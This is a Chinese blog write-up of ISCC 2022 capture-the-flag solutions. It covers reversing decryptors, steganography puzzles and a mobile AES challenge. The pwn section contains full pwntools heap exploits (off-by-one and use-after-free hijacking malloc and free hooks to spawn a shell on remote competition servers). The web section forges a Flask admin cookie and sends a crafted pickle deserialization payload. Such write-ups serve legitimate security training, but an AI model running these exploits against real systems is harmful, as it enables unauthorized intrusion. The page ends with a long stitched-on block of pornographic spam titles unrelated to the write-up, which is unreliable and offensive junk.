    strcpy((char *)str, "LWHFUENGDJGEFHYDHIGJ"); HIBYTE(str[10]) = 0; str[11] = 0; v7 = 0; v8 = 0; len = j__strlen(flag); j__memset(array, 0, 0x78u); for ( i = 0; i < len; ++i )array[i] = *((char *)str + i) + flag[i];

    如下為解密腳本;

    array = [149,169,137,134,212,188,177,184,177,197,192,179,153,145,156,193,161,190,161,184] str = "LWHFUENGDJGEFHYDHIGJ" flag = "" for i in range(len(str)):flag = array[i] - ord(str[i])flag ^= iprint(chr(flag),end='')

    ISCC{reverse_DMrIdH}

    How_decode

    64位Windows可執(zhí)行程序,使用ida64進(jìn)行反匯編,發(fā)現(xiàn)以下關(guān)鍵代碼:

    因?yàn)閙m數(shù)組為int類型,32位;而python很難去處理這樣擁有固定上限的數(shù)據(jù),所以我們采用C語(yǔ)言來(lái)處理這樣的數(shù)據(jù);

    如上為關(guān)鍵加密腳本;故我們根據(jù)上面代碼于C編譯器之中,修改部分代碼運(yùn)行即可獲取flag;

    如下為解密腳本:

    #include<iostream> using namespace std;void __cdecl decode(int *v, int n, const int *key) {int *v4; // raxint *v5; // raxint y; // [rsp+8h] [rbp-18h]int e; // [rsp+Ch] [rbp-14h]int rounds; // [rsp+10h] [rbp-10h]int p; // [rsp+14h] [rbp-Ch]int sum; // [rsp+18h] [rbp-8h]int z; // [rsp+1Ch] [rbp-4h]//v為輸入的flag,n為輸入的長(zhǎng)度18,key為固定值 rounds = 52 / n + 6;sum = rounds * -1640531527;y = v[0];for (; rounds--;){e = (sum >> 2) & 3;//固定值 for ( p = n - 1; p >= 0 ; --p ){z = v[(p + n -1)%n];v4 = &v[p];*v4 -= ((y ^ sum) + (z ^ key[e ^ (p & 3)])) ^ (((4 * y) ^ (z >> 5)) + ((y >> 3) ^ (16 * z)));y = v[p];}sum += 1640531527;} }int main() {int mm[32]; // [rsp+20h] [rbp-60h] BYREFint k[4]; // [rsp+A0h] [rbp+20h] BYREFmm[0] = 137373765;mm[1] = -1499780648;mm[2] = 724715491;mm[3] = 81257581;mm[4] = 1504671520;mm[5] = -1297390125;mm[6] = -915424294;mm[7] = -1643886293;mm[8] = 370393719;mm[9] = 837200773;mm[10] = 554624892;mm[11] = -440804440;mm[12] = 1197608501;mm[13] = 1866916284;mm[14] = -2081810180;mm[15] = 236155496;mm[16] = 748155328;mm[17] = -1413892284;k[0] = 73;k[1] = 83;k[2] = 67;k[3] = 67;decode(mm, 18, k);for(int i = 0; i < 18 ; i++){printf("%c", mm[i]);}return 0;} //ISCC{Kqykc0kdNjcD}

    ISCC{Kqykc0kdNjcD}

    Sad Code

    分析main_0函數(shù),流程較為簡(jiǎn)單且明顯,如下:

    故利用z3該python庫(kù),來(lái)解決該多元方程組,腳本如下:

    from z3 import *s = Solver() mith = [Int(f'{i}') for i in range(8)] s.add(mith[2] + 7 * mith[1] - 4 * mith[0] - 2 * mith[3] == 0x1F6B7856C) s.add(5 * mith[3] + 3 * mith[2] - mith[1] - 2 * mith[0] == 0x10BE1E7C7) s.add(2 * mith[1] + 8 * mith[3] + 10 * mith[0] - 5 * mith[2] == 0x49CB05E09) s.add(7 * mith[0] + 15 * mith[1] - 3 * mith[3] - 2 * mith[2] == 0x7EA87530B) s.add(15 * mith[4] + 35 * mith[7] - mith[5] - mith[6] == 0xCABA96AC9) s.add(38 * mith[6] + mith[4] + mith[7] - 24 * mith[5] == 0x51198C284) s.add(38 * mith[5] + 32 * mith[4] - mith[6] - mith[7] == 0x14C896AD3E) s.add(mith[4] + 41 * mith[6] - mith[5] - 25 * mith[7] == 0x6FAA694D1) if s.check():#print(s.model())tmp = str(s.model()) flag = [0,0,0,0,0,0,0,0] begin = 1 while begin < len(tmp):flag[int(tmp[begin:begin+1],10)] = int(tmp[begin+4:begin+14],10)begin += 17 for i in range(len(flag)):tmp = str(hex(flag[i]))[2:]for j in range(0,8,2):print(chr(int(tmp[j:j+2],16)),end='') #ISCC{KGACPRSC-YQBHDIXK-PVXFEEBO}

    ISCC{KGACPRSC-YQBHDIXK-PVXFEEBO}

    Ruststr(未解出,未寫

    GetTheTable

    使用ida64反編譯,查看偽代碼;發(fā)現(xiàn)采用了base58加密,具有明顯特征;

    故使用base58在線解密工具進(jìn)行解密;http://www.hiencode.com/base58w.html

    ISCC{cKXBNcd9tDBdG}

    Bob’s Code

    函數(shù)的流程比較簡(jiǎn)單;

    故,我們首先將mm該原始數(shù)據(jù),進(jìn)行j_BLmm該函數(shù)的字母替換,進(jìn)而進(jìn)行兩次base64解密;此時(shí)我們尋找到兩張base64表;可以發(fā)現(xiàn):

    故,此時(shí)得到了信息,表2經(jīng)過(guò)了加密,故我們需要再對(duì)表2進(jìn)行解密;

    import base64 flag = "W1BqthGbfhNWXVN1BGJifhBVoVpVgOz5YOzqs01FoY1qtWRABWtcuG9koF0" f = [] for i in range(len(flag)):tmp = ord(flag[i])if 'A' <= flag[i] <= 'Z':tmp = (ord(flag[i]) - 67) % 26 + 65elif 'a' <= flag[i] <= 'z':tmp = (ord(flag[i]) - 99) % 26 + 97f.append(tmp)flag = "" for i in f:flag += chr(i) print(flag)table1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_" tmp_table = [] for i in range(len(table1)):#對(duì)ida之中表2的解密tmp_table.append(ord(table1[i])) tb = tmp_table for i in range(5,19):tmp = tmp_table[i]tmp_table[i] = tb[i + 26]tb[i + 26] = tmp table1 = "" for i in range(len(tb)):table1 += chr(tb[i])table2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" flag = "".join(flag)+"===="#填充=號(hào)字符 print("1. 字母替換: "+flag) flag = base64.b64decode(flag.translate(str.maketrans(table1,table2))) print("2. base1: "+str(flag)) flag = base64.b64decode(flag) print("2. base2: "+str(flag)) #ISCC{XMOntqmU-wK9rfSB0-f4BWx6G8}

    ISCC{XMOntqmU-wK9rfSB0-f4BWx6G8}

    MOBLIE

    MobileA

    利用jadx工具進(jìn)行逆向分析,利用初步分析如下:

    此時(shí)模仿輪替加密來(lái)進(jìn)行對(duì)密文符號(hào)順序進(jìn)行恢復(fù);

    a = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0] i = 0 i2 = 5 z = False while i2 >= 0:if not z:i3 = 3while i3 >= 0:a[i] = i3 * 6 + i2i+=1i3-=1z = Trueelse:i4 = 0while i4 <= 3:a[i] = i4 * 6 + i2i+=1i4+=1z = Falsei2-=1 flag = "=1PmCCY=gQbcBQlnngbhpEEA" md5 = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0] l = 0 for i in a:md5[i] = flag[l]l+=1 for i in range(len(md5)):print(md5[i],end='') #phBcCmEbQbCPEglQY1Anng==

    將上述腳本所得到的進(jìn)行md5解密,結(jié)果為yes;

    同時(shí)發(fā)現(xiàn)上面代碼之中存在key與iv兩個(gè)對(duì)應(yīng)AES解密之中的key與偏移量;故根據(jù)代碼執(zhí)行流程,先進(jìn)行Base64加密;然后作為key與偏移量進(jìn)行AES解密;

    K@e2022%%y -base64-> S0BlMjAyMiUleQ== I&V2022*** -base64-> SSZWMjAyMioqKg== MW5QM0JPcklpSEN6L1l4RG1UekhNZz09 -base64解密-> 1nP3BOrIiHCz/YxDmTzHMg==

    使用AES在線解密網(wǎng)址進(jìn)行解密

    ISCC{ASDxv*&^@!FGHJ_yes}

    MISC

    單板小將蘇翊鳴

    可以發(fā)現(xiàn)附件中圖片明顯高度過(guò)低,故利用winhex修改

    解碼如下:

    \u5728\u8fd9\u6b21\u51ac\u5965\u4f1a\u7684\u821e\u53f0\u4e0a\uff0c\u6211\u56fd\u5c0f\u5c06\u82cf\u7fca\u9e23\u65a9\u83b7\u4e00\u91d1\u4e00\u94f6\uff0c\u90a3\u4f60\u77e5\u9053\u6b64\u6b21\u51ac\u5965\u4f1a\u6211\u56fd\u603b\u5171\u83b7\u5f97\u51e0\u679a\u5956\u724c\u5417\uff1f\u53c8\u5206\u522b\u662f\u51e0\u91d1\u51e0\u94f6\u51e0\u94dc\u5462\uff1f

    利用Unicode解碼:

    在這次冬奧會(huì)的舞臺(tái)上,我國(guó)小將蘇翊鳴斬獲一金一銀,那你知道此次冬奧會(huì)我國(guó)總共獲得幾枚獎(jiǎng)牌嗎?又分別是幾金幾銀幾銅呢?

    2022冬奧會(huì)共獲得15塊獎(jiǎng)牌,分別為9金4銀2銅;所以壓縮包的密碼為15942;可以得到壓縮包里面的flag;

    ISCC{beij-dbxj-2009}

    降維打擊

    發(fā)現(xiàn)附件為png圖片;大小為301KB;故圖片隱藏了某些東西;使用foremost

    ┌──(kali?kali)-[~/桌面]

    └─$ foremost misc-DimensionalityReductionStrike-14.png -T

    Processing: misc-DimensionalityReductionStrike-14.png

    |*|

    發(fā)現(xiàn)多出了一個(gè)極其模糊的圖片;猜測(cè)為L(zhǎng)SB等隱寫技術(shù);故利用zsteg該解密工具進(jìn)行嘗試;

    zsteg -E “b1,r,lsb,yx” 00000567.png > p.png

    將圖片導(dǎo)出;發(fā)現(xiàn)為魔女文字,故對(duì)照魔女文字進(jìn)行解密;

    ISCC{INGZ-AXBP-FXLS}

    藏在星空中的詩(shī)

    附件存在一張psd圖片,使用PS打開(kāi)并將不透明度調(diào)至100%,可以發(fā)現(xiàn)存在密文;

    該密文為13524,并通過(guò)Poem.txt來(lái)得到解壓密碼

    1:☆???? 2:?🟇??? 3:??🟃?🟔 4:★??☆? 5:🌠??🟔🞱 解壓密碼: ☆??????🟃?🟔🌠??🟔🞱?🟇???★??☆? 根據(jù)Exel表之中的密碼解密得到如下flag; 1.flag= 2.ISCC{ 3.IAWKZ 4.EICFJ 5.TKHZ} ISCC{IAWKZEICFJTKHZ}

    ISCC{IAWKZEICFJTKHZ}

    真相只有一個(gè)

    附件之中存在stream無(wú)后綴的文件,故使用hex查看文件格式,猜測(cè)為zip;

    故修改后綴為zip,解壓發(fā)現(xiàn)需要密碼;而發(fā)現(xiàn)圖片的LSB通道之中隱含部分密碼;

    經(jīng)過(guò)測(cè)試發(fā)現(xiàn)該密碼不完整;故利用ARCHPR進(jìn)行爆破,發(fā)現(xiàn)密碼19981111;

    然后使用WireShark打開(kāi)該流量包,發(fā)現(xiàn)TFTP傳輸之中包含了mp3文件,故導(dǎo)出該文件;

    利用Audacity音頻工具打開(kāi)該mp3文件;

    發(fā)現(xiàn)音頻部分解密為isccmisc;而flag.txt部分存在SNOW加密;但是需要密碼;故我們利用mp3所得到的密碼來(lái)對(duì)flag.txt進(jìn)行SNOW解密;得到flag

    ISCC{vnQd-Hjnf-yEev}

    2022冬奧會(huì)

    附件之中存在題圖,使用winhex打開(kāi)修改高度;

    發(fā)現(xiàn)原圖片之中隱藏的密文;

    發(fā)現(xiàn)其為NCR編碼;解密發(fā)現(xiàn)原文;

    并且題目提示"2022冬奧會(huì)在北京舉辦,身為東道主的你知道此次冬奧會(huì)的吉祥物分別是誰(shuí)嗎?并且你知道這兩只冬奧會(huì)的吉祥物最初設(shè)計(jì)的原型分別是什么嗎?我只能提示你其中有一只的原型是我們的國(guó)寶哦"

    故原型分別為熊貓和燈籠,而提示了國(guó)寶(熊貓),那么就剩下了燈籠,嘗試"燈籠"

    發(fā)現(xiàn)壓縮包密碼為"燈籠";解壓,發(fā)現(xiàn)存在圖片jpg;修改后綴明為txt打開(kāi),發(fā)現(xiàn)flag;

    ISCC{beij-dahb-1042}

    隱秘的信息

    首先已知信息為ZWFzeV90b19maW5kX3RoZV9mbGFn該字符串,通過(guò)base64解密發(fā)現(xiàn)easy_to_find_the_flag該字符串;該字符串為壓縮包密碼;解壓發(fā)現(xiàn)圖片;

    經(jīng)過(guò)嘗試,查看LSB:

    使用如下腳本轉(zhuǎn)換為flag;

    a = "fffe92a68686f6d4e4d08e96e8686684c2c4e292aa6c8ae8d4e464fa01f8007f" a = int(a,16) b = str(bin(a))[17:]for i in range(0,len(b),8):tmp = int(b[i:i+8],2)print(chr(tmp),end='') #ISCC{jrhGKt43BabqIU6Etjr2} ü ?

    ISCC{jrhGKt43BabqIU6Etjr2}

    藏在星空中的詩(shī)-2

    發(fā)現(xiàn)一長(zhǎng)串極具有特征的字符,故使用藏在星空中的詩(shī)該題目之中的密文轉(zhuǎn)換表,得到unicode編碼;轉(zhuǎn)為字符即可;

    這里可以根據(jù)較為明顯的特征ISCC{}來(lái)發(fā)現(xiàn)其密文轉(zhuǎn)換表;

    這里根據(jù)密文可以發(fā)現(xiàn)其為unicode編碼格式,而字符"I"的unicode編碼為\u0049;對(duì)于這\🌟🌠🌠?🟉該符號(hào);即知🌠對(duì)于0,?對(duì)于4,🟉對(duì)應(yīng)9;

    同時(shí)這三個(gè)字符🌠對(duì)應(yīng)U+1F320,?對(duì)應(yīng)U+2734,🟉對(duì)應(yīng)U+1F7C9;

    可以發(fā)現(xiàn)規(guī)律,即其特殊符號(hào)的unicode編碼最后一位對(duì)應(yīng)著原文數(shù)字;

    同理,我們可以將所有的unicode轉(zhuǎn)換為原文,進(jìn)而可以轉(zhuǎn)換為中文,即出現(xiàn)flag;

    \🌟🌠🌠?🟉->\u0049 \🌟🌠🌠★?->\u0053 \🌟🌠🌠??->\u0043 \🌟🌠🌠??->\u0043 \🌟🌠🌠??->\u007b \🌟🌠🌠?★->\u0045 \🌟🌠🌠??->\u0043 \🌟🌠🌠??->\u004f \🌟🌠🌠??->\u004b \🌟🌠🌠?☆->\u0046 \🌟🌠🌠?🌠->\u0040 \🌟🌠🌠?🌠->\u0040 \🌟🌠🌠?☆->\u0026 \🌟🌠🌠?★->\u0045 \🌟🌠🌠??->\u004e \🌟🌠🌠??->\u0028 \🌟🌠🌠??->\u0077 \🌟🌠🌠??->\u0044 \🌟🌠🌠??->\u0074 \🌟🌠🌠??->\u007d 整理得 \u0049\u0053\u0043\u0043\u007b\u0045\u0043\u004f\u004b\u0046\u0040\u0040\u0026\u0045\u004e\u0028\u0077\u0044\u0074\u007d unicode轉(zhuǎn)中文即可獲取flag ISCC{ECOKF@@&EN(wDt}

    ISCC{ECOKF@@&EN(wDt}

    套中套(未寫,未交

    發(fā)現(xiàn)附件為壓縮包與一個(gè)png圖片,使用winhex打開(kāi)png發(fā)現(xiàn)頭部信息缺失,故添加上png文件頭信息;

    查看圖片發(fā)現(xiàn)flag的一部分;

    flag1: wELC0m3_;

    flag2: _ISCC_Zo2z;

    wELC0m3__ISCC_Zo2z

    擂臺(tái)PWN

    careless_note

    libc版本為2.23遠(yuǎn)古版本;增刪改查皆有;存在off by one漏洞;故可以利用該漏洞造成堆塊重疊;

    from pwn import * context(log_level='debug',os='linux',arch='amd64')binary = './careless_note' r = remote('123.57.69.203',8010) #r = process(binary) #elf = ELF(binary) #libc = elf.libc libc = ELF('/home/pwn/question/iscc/libc-2.23.so') bss_chunk =0x06020C0 def Allocate(size=0x18,payload=b'/bin/sh\x00'):r.sendlineafter("Your choice :",'1')r.sendlineafter("Size of Heap : ",str(size))r.sendafter("Content of heap:",payload)def Edit(index,payload):r.sendlineafter("Your choice :",'2')r.sendlineafter("Index :",str(index))r.sendlineafter("Your choose:",str(1))r.sendlineafter("Content of heap : ",payload)def Free(index):r.sendlineafter("Your choice :",'2')r.sendlineafter("Index :",str(index))r.sendlineafter("Your choose:",str(0))def Show(index):r.sendlineafter("Your choice :",'3')r.sendlineafter("Index :",str(index))one = [0x45226,0x4527a,0xf03a4,0xf1247] Allocate(0x308)#0 Allocate()#1 Free(0) Allocate(0x18,b'a'*8)#0 Show(0)#泄露地址 libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-232-0x280-libc.symbols['__malloc_hook']# leak libc malloc_hook = libc_base+libc.symbols['__malloc_hook']Allocate(0x8)#2 Free(0) Free(2)Allocate(0x98)#0 Allocate(0x58)#2 Allocate(0x98)#3 Free(0) Edit(2,b'b'*0x50+p64(0x100)+p8(0xa0)) Free(3)Allocate(0x68)#0 Allocate(0x68)#3 Allocate(0x68)#4 Free(0) Free(3) Free(4)#堆風(fēng)水,構(gòu)造布局 Edit(2,b'c'*0x38+p64(0x71)+p64(malloc_hook-0x23))#常規(guī)位置Allocate(0x68)#0 Allocate(0x68)#3 Edit(3,b'd'*0x13+p64(one[1]+libc_base))#寫入__malloc_hook為one_gadget success("libc_base -> "+hex(libc_base)) success("bss_chunk -> "+hex(bss_chunk)) #gdb.attach(r) r.sendlineafter("Your choice :",'1')#申請(qǐng)堆塊,觸發(fā)__malloc_hookr.interactive()
  • 首先利用unsorted bin塊特性泄露libc地址,進(jìn)而可以計(jì)算出system函數(shù)地址以及malloc_hook函數(shù)地址;
  • 構(gòu)造堆分水,進(jìn)而修改fastbin的fd指針指向malloc_hook-0x23位置,進(jìn)而修改其為gadget即可;
  • ISCC{7c74-bf11-4428-a609-1f76}

    ezuaf

    該為64位2.27libc的附件,存在漏洞為UAF;

    故,我們可以首先申請(qǐng)較大的堆塊來(lái)泄露地址,進(jìn)而計(jì)算出system地址與free_hook地址;進(jìn)而利用UAF漏洞造成tcache bin的fd指針指向free_hook,修改其內(nèi)容為system地址,進(jìn)而free(“/bin/sh”);獲取權(quán)限;

    from pwn import * context(log_level='debug',os='linux',arch='amd64')binary = './ezuaf' #r = process(binary) r = remote('123.57.69.203',8020) elf = ELF(binary) #libc = elf.libc libc = ELF('./libc-2.27.so') def Allocate(size=0x18):r.sendlineafter(":",'1')r.sendlineafter("Input size:",str(size))def Edit(index,payload):r.sendlineafter(":",'2')r.sendlineafter("Input page\n",str(index))r.sendlineafter("Input your massage:",payload)def Free(index):r.sendlineafter(":",'3')r.sendlineafter("Input page",str(index))def Show(index):r.sendlineafter(":",'4')r.sendlineafter("Input page",str(index))Allocate(0x410)#0 unsorted bin -> 泄露地址,計(jì)算偏移 Allocate()#1 tcache bin -> 利用UAF,造成任意地址寫 Allocate()#2 Free(0) Show(0)#leak libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-96-0x10-libc.symbols["__malloc_hook"] system = libc_base+libc.symbols["system"] free_hook = libc_base+libc.symbols["__free_hook"]Free(1) Edit(1,p64(free_hook))#修改tcache的fd指針指向free_hook Allocate()#3 Allocate()#4 Edit(4,p64(system))#修改free_hook內(nèi)容為system Edit(2,b'/bin/sh\x00')#填充"/bin/sh\x00"特殊字符串 success(hex(libc_base)) #gdb.attach(r) Free(2)#相當(dāng)于執(zhí)行了system("/bin/sh");r.interactive()

    ISCC{1ae2-4ac8-403b-97df-13ae}

    擂臺(tái)MISC

    666

    壓縮包存在密碼,故使用winhex打開(kāi),發(fā)現(xiàn)為偽加密;故修改全局方位標(biāo)記為00;

    解壓發(fā)現(xiàn)存在圖片與壓縮包;而壓縮包是存在密碼的,故我們猜測(cè)密碼位于圖片之中,故我們采用隱寫工具steghide來(lái)搜索圖片之中可能存在的隱藏的內(nèi)容

    發(fā)現(xiàn)新的圖片,故我們嘗試修改高度,發(fā)現(xiàn)特殊字符:

    !@#$%678()_+為壓縮包密碼,其中為流量包,經(jīng)過(guò)一番搜索,發(fā)現(xiàn)了一個(gè)神秘的網(wǎng)址;

    神秘的鏈接,發(fā)現(xiàn)為一個(gè)gif動(dòng)態(tài)圖,然后

    base1:SElERWtleTo4NTIgOTg3NDU2MzIxIDk4NDIzIDk4NDIzIFJFQUxrZXk6eFN4eA==

    base2:pQLKpP/EPmw301eZRzuYvQ==

    共三段base64密文,可以拼湊為兩個(gè)base64密文,進(jìn)行解密發(fā)現(xiàn)為:

    HIDEkey:852 987456321 98423 98423 REALkey:xSxx

    通過(guò)九宮格鍵可以推導(dǎo)出ISCC,故我們接下來(lái)進(jìn)行AES解密:

    AES解密網(wǎng)站,進(jìn)行解密:(得到flag

    ISCC{lbwmeiyoukaig}

    擂臺(tái)Reverse

    Encode(未寫完

    代碼流程較為簡(jiǎn)單,如下,則進(jìn)入encode函數(shù)分析代碼流程;

    如下,為encode函數(shù)加密過(guò)程:

    擂臺(tái)Web

    Melody

    首先通過(guò)查看源碼,發(fā)現(xiàn)一個(gè)有趣的鏈接:

    訪問(wèn)之后,提示只能用Melody瀏覽器登錄;故使用BP抓包工具修改User-Agent:為User-Agent: Melody再次訪問(wèn);再次提示The url format of the query information:/info/?Melody=;

    說(shuō)明存在Melody該GET變量;通過(guò)測(cè)試發(fā)現(xiàn)存在SSTI模板注入;

    此時(shí)發(fā)現(xiàn)通用密鑰,故可以利用SECRET_KEY來(lái)繞過(guò)flask的session認(rèn)證;meldoy-is-so-cute-wawawa!;如下利用python之中的flask-unsign工具來(lái)自動(dòng)破解secretkey,然后修改cookie內(nèi)容并重新簽名;

    ┌──(kali?kali)-[~/.local/bin]

    └─$ python3 flask-unsign --sign --cookie “{‘username’:‘a(chǎn)dmin’}” --secret ‘meldoy-is-so-cute-wawawa!’

    eyJ1c2VybmFtZSI6ImFkbWluIn0.YnSNQg.8SUJyF58jVP7UHQMHMtTQ_JkiUY

    此時(shí)登錄,并修改Cookie保持會(huì)話為如上內(nèi)容!此時(shí),發(fā)現(xiàn)沒(méi)有flag;但是查看源碼時(shí)候,發(fā)現(xiàn)了view-source:http://59.110.159.206:7040/static/real_flag_part.py該源碼;引用了pickle庫(kù);故可以利用pickle反序列化來(lái)獲取flag

    # -*- coding:utf-8 -*- import pickle import melody import base64 from flask import Flask, Response,requestclass register:def __init__(self,name,password):#初始化賬戶密碼self.name = nameself.password = passworddef __eq__(self, other):#當(dāng)使用==將會(huì)調(diào)用該函數(shù) 判斷賬戶密碼是否相同return type(other) is register and self.name == other.name and self.password == other.passwordclass RestrictedUnpickler(pickle.Unpickler):def find_class(self, module, name):if module[0:8] == '__main__':return getattr(sys.modules['__main__'],name)#返回對(duì)象的屬性值raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))def find(s):return RestrictedUnpickler(io.BytesIO(s)).load()#load()將對(duì)象反序列化 #發(fā)現(xiàn)/therealflag頁(yè)面,方式擁有GET、POST傳參 @app.route('/therealflag', methods=['GET','POST']) def realflag():if request.method == 'POST':#需要POST傳參try:data = request.form.get('melody')#獲取表單參數(shù)molodyif b'R' in base64.b64decode(data):#不允許存在object.__reduce__()方法return 'no reduce'else:result = find(base64.b64decode(data))#base64解碼 并執(zhí)行RestrictedUnpickler函數(shù)if type(result) is not register:#判斷類型return 'The type is not correct!'correct = ((result == register(melody.name,melody.password))&(result == register("melody","hug")))if correct:if session['username'] == 'admin':#判斷會(huì)話是否為adminreturn Response(read('./flag.txt'))#返回flagelse:return Response("You're not admin!")except Exception as e:return Response(str(e)) #如果直接訪問(wèn)/therealflag頁(yè)面,將會(huì)返回一個(gè)base64加密的序列化函數(shù)test = register('admin', '123456')data = base64.b64encode(pickle.dumps(test)).decode()return Response(data)

    故利用pickle反序列化進(jìn)行攻擊,如下為腳本;

    import requests import pickle import pickletools import base64 class register:def __init__(self,name,password):#初始化賬戶密碼self.name = nameself.password = passworda = pickle.dumps(register("melody","hug"))#該處無(wú)需添加參數(shù),protocol=0 c = pickletools.optimize(a)#精簡(jiǎn)序列 #pickletools.dis(c) if b'R' in c:#判斷是否合法print("no")pick = base64.b64encode(c) url = "http://59.110.159.206:7040/therealflag" head = {"Cookie": "session=eyJ1c2VybmFtZSI6ImFkbWluIn0.YnSNQg.8SUJyF58jVP7UHQMHMtTQ_JkiUY" } data = {"melody": pick } r = requests.post(url=url,data=data,headers=head) print(r.text)

    ISCC{2022_melody_secrets}

    總結(jié)

    以上是生活随笔為你收集整理的ISCC 2022的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

    如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

    天天拍夜夜添久久精品大 | 国产精品久久精品三级 | 婷婷综合久久中文字幕蜜桃三电影 | 水蜜桃av无码 | 老司机亚洲精品影院 | 午夜精品一区二区三区在线观看 | 亚洲欧洲无卡二区视頻 | 十八禁视频网站在线观看 | 大地资源中文第3页 | 国产在线一区二区三区四区五区 | 丰满少妇女裸体bbw | 国产精品无套呻吟在线 | ass日本丰满熟妇pics | 人人爽人人爽人人片av亚洲 | 欧美丰满少妇xxxx性 | 午夜免费福利小电影 | 性开放的女人aaa片 | 亚洲日韩av一区二区三区四区 | 无码精品国产va在线观看dvd | 日日天日日夜日日摸 | 波多野结衣一区二区三区av免费 | 免费观看黄网站 | 国产av一区二区精品久久凹凸 | 5858s亚洲色大成网站www | 精品久久久久香蕉网 | 特大黑人娇小亚洲女 | 中文亚洲成a人片在线观看 | 亚洲国产精品一区二区第一页 | 欧美老熟妇乱xxxxx | 67194成是人免费无码 | 在线欧美精品一区二区三区 | 欧美激情一区二区三区成人 | 扒开双腿疯狂进出爽爽爽视频 | 国产精品久久久一区二区三区 | 国产成人无码区免费内射一片色欲 | 久久精品成人欧美大片 | 久久99精品久久久久婷婷 | 欧美精品国产综合久久 | 午夜成人1000部免费视频 | 乱中年女人伦av三区 | 亚洲理论电影在线观看 | 亚洲成av人片天堂网无码】 | 无码午夜成人1000部免费视频 | 亚洲aⅴ无码成人网站国产app | 久久国产精品精品国产色婷婷 | 一区二区三区乱码在线 | 欧洲 | 欧美激情综合亚洲一二区 | 少妇人妻大乳在线视频 | 人人妻人人澡人人爽欧美精品 | 国产精品鲁鲁鲁 | 任你躁国产自任一区二区三区 | 国产亚av手机在线观看 | 日本精品久久久久中文字幕 | 色偷偷人人澡人人爽人人模 | 鲁大师影院在线观看 | 日本成熟视频免费视频 | 中文字幕乱妇无码av在线 | 日韩精品乱码av一区二区 | a片免费视频在线观看 | 人人爽人人爽人人片av亚洲 | 亚洲天堂2017无码 | 久久久久久久女国产乱让韩 | 黑人巨大精品欧美一区二区 | 欧美一区二区三区 | 欧美激情内射喷水高潮 | 国产在线一区二区三区四区五区 | 国产成人午夜福利在线播放 | 亚洲成a人片在线观看日本 | 国产成人无码av片在线观看不卡 | 一本无码人妻在中文字幕免费 | 国产色精品久久人妻 | 奇米综合四色77777久久 东京无码熟妇人妻av在线网址 | 老熟妇仑乱视频一区二区 | 国产精品无码一区二区桃花视频 | 久久精品女人的天堂av | 欧美 丝袜 自拍 制服 另类 | 亚洲精品综合一区二区三区在线 | 亚洲男女内射在线播放 | 亚洲阿v天堂在线 | 日本一卡二卡不卡视频查询 | 亚洲成在人网站无码天堂 | 国产极品美女高潮无套在线观看 | 亚洲の无码国产の无码影院 | 日本一区二区三区免费高清 | 久久国产自偷自偷免费一区调 | 无码av岛国片在线播放 | 精品日本一区二区三区在线观看 | 动漫av网站免费观看 | 无码国产色欲xxxxx视频 | 久久精品国产日本波多野结衣 | 国产精品久久久久久亚洲毛片 | 亚洲色欲色欲天天天www | 国产午夜视频在线观看 | 搡女人真爽免费视频大全 | 巨爆乳无码视频在线观看 | 久久午夜夜伦鲁鲁片无码免费 | 欧美日本精品一区二区三区 | 未满成年国产在线观看 | 国产av一区二区精品久久凹凸 | 精品乱子伦一区二区三区 | 中文字幕乱码人妻无码久久 | 在线观看国产午夜福利片 | 国产精华av午夜在线观看 | 亚洲精品中文字幕乱码 | 中文字幕av伊人av无码av | 中文字幕乱妇无码av在线 | 男人的天堂2018无码 | 精品一区二区三区无码免费视频 | 在教室伦流澡到高潮hnp视频 | 鲁大师影院在线观看 | 久久久久av无码免费网 | 综合激情五月综合激情五月激情1 | 国产精品无码永久免费888 | 国产亚洲视频中文字幕97精品 | 久久zyz资源站无码中文动漫 | 欧美日韩综合一区二区三区 | 三级4级全黄60分钟 | 国产成人av免费观看 | 亚洲成a人片在线观看日本 | 国产性生交xxxxx无码 | 国产特级毛片aaaaaa高潮流水 | √天堂资源地址中文在线 | 国产成人综合色在线观看网站 | 亚洲中文字幕在线观看 | 性欧美牲交xxxxx视频 | 国产做国产爱免费视频 | 一区二区传媒有限公司 | 久久精品国产99精品亚洲 | 久久精品99久久香蕉国产色戒 | 亚洲国产av精品一区二区蜜芽 | 久久精品99久久香蕉国产色戒 | 精品日本一区二区三区在线观看 | 日韩欧美群交p片內射中文 | 免费看男女做好爽好硬视频 | 国产69精品久久久久app下载 | 亚洲性无码av中文字幕 | 中文字幕色婷婷在线视频 | 乱人伦中文视频在线观看 | 高潮毛片无遮挡高清免费视频 | 久久午夜无码鲁丝片 | 九九热爱视频精品 | 久9re热视频这里只有精品 | 牲欲强的熟妇农村老妇女视频 | 日本大乳高潮视频在线观看 | 在线精品国产一区二区三区 | 国产精品对白交换视频 | 国产美女精品一区二区三区 | 无码精品国产va在线观看dvd | 亲嘴扒胸摸屁股激烈网站 | 精品人妻人人做人人爽夜夜爽 | av在线亚洲欧洲日产一区二区 | 国产超碰人人爽人人做人人添 | 人人澡人摸人人添 | 国产9 9在线 | 中文 | 国产成人无码av片在线观看不卡 | а天堂中文在线官网 | 国产一区二区三区精品视频 | 国产精品无套呻吟在线 | 一区二区三区高清视频一 | 99精品无人区乱码1区2区3区 | 成人欧美一区二区三区黑人免费 | 亚洲中文字幕无码一久久区 | 少妇久久久久久人妻无码 | 伊在人天堂亚洲香蕉精品区 | 在线播放无码字幕亚洲 | aa片在线观看视频在线播放 | 小泽玛莉亚一区二区视频在线 | 色婷婷综合中文久久一本 | 又黄又爽又色的视频 | 成在人线av无码免观看麻豆 | 日日碰狠狠躁久久躁蜜桃 | 国产乱人伦app精品久久 国产在线无码精品电影网 国产国产精品人在线视 | 国产精品自产拍在线观看 | 日日摸天天摸爽爽狠狠97 | 国产精品亚洲综合色区韩国 | 狠狠色噜噜狠狠狠7777奇米 | 国产成人精品一区二区在线小狼 | 欧美日韩色另类综合 | 性色av无码免费一区二区三区 | 色偷偷av老熟女 久久精品人妻少妇一区二区三区 | 